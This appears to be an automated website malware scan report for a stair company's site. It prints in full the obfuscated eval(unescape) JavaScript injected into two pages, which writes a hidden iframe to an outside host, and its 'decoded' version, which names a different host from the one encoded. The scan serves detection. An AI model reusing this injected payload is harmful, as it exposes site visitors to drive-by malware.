Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=heightsstairs.com.au
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://heightsstairs.com.au/ | 200 OK Content-Length: 8194 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var msg=314,d=document; eval(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%62%66%65%31%64%38%64%38%34%38%65%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%72%61%6d%6f%6e%65%79%6d%61%79%6b%65%72%2e%63%6e%2f%61%6c%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%36%38%29%2b%27%63%39%62%64%37%5c%27%20%77%69%64%74%68%3d%38%31%20%68%65%69%67%68%74%3d%32%38%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29') ); Decoded script: <iframe src="http://umaxx.in/security/index.php" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
| ||
http://heightsstairs.com.au/index.html | 200 OK Content-Length: 8194 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var msg=314,d=document; eval(unescape ('%20%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%62%66%65%31%64%38%64%38%34%38%65%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%72%61%6d%6f%6e%65%79%6d%61%79%6b%65%72%2e%63%6e%2f%61%6c%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%32%36%38%29%2b%27%63%39%62%64%37%5c%27%20%77%69%64%74%68%3d%38%31%20%68%65%69%67%68%74%3d%32%38%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%3e%27%29') ); Decoded script: <iframe src="http://umaxx.in/security/index.php" width=1 height=1 style="visibility: hidden"></iframe> Antivirus reports:
| ||
http://heightsstairs.com.au/spiral.html | 200 OK Content-Length: 5899 Content-Type: text/html | clean |
http://heightsstairs.com.au/gallery.html | 200 OK Content-Length: 5418 Content-Type: text/html | clean |
http://heightsstairs.com.au/contact.html | 200 OK Content-Length: 5455 Content-Type: text/html | clean |
http://heightsstairs.com.au/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: heightsstairs.com.au
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 08:55:30 GMT
Accept-Ranges: bytes
ETag: "70163c-2002-4461f5cc22340"
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips
Content-Length: 8194
Content-Type: text/html
Last-Modified: Thu, 14 Feb 2008 14:47:01 GMT
...8194 bytes of data.
GET / HTTP/1.1
Host: heightsstairs.com.au
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 14 Jan 2015 08:55:30 GMT
Accept-Ranges: bytes
ETag: "70163c-2002-4461f5cc22340"
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips
Content-Length: 8194
Content-Type: text/html
Last-Modified: Thu, 14 Feb 2008 14:47:01 GMT
...8194 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: heightsstairs.com.au
Referer: http://www.google.com/search?q=heightsstairs.com.au
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: heightsstairs.com.au
Referer: http://www.google.com/search?q=heightsstairs.com.au
Result:
The result is similar to the first query. There are no suspicious redirects found.